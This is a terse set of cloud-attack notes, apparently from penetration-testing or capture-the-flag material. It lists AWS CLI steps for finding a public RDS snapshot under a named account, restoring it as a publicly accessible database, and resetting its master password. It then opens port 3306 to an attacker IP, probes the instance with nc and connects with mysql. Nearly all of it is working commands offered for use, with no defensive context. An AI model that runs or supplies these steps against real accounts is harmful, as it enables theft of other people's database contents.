aws rds describe-db-instances
- Searching partial snapshots aws rds describe-db-snapshots --include-public --snapshot-type public --db-snapshot-identifier arn:aws:rds:us-east-1:159236164734:snapshot:globalbutterdbbackup
- Restore in instance aws rds restore-db-instance-from-db-snapshot --db-instance-identifier recoverdb --publicly-accessible --db-snapshot-identifier arn:aws:rds:us-east-1:159236164734:snapshot:globalbutterdbbackup --availability-zone us-east-1b
- Once restored, try to access aws rds describe-db-instances --db-instance-identifier recoverdb
- Reset the master credentials
aws rds modify-db-instance --db-instance-identifier recoverdb --master-user-password NewPassword1 --apply-immediately
- Takes some time, you can check the status: aws rds describe-db-instances
- Try to access it from EC2 instance which was restored nc rds-endpoint 3306 -zvv
- If you can't see, you may open 3306:
- In RDS console, click on the recoverdb instance
- Click on the Security Group
- Add an Inbound rule for port 3306 TCP for Cloudhacker IP
- Then connect it mysql -u -p -h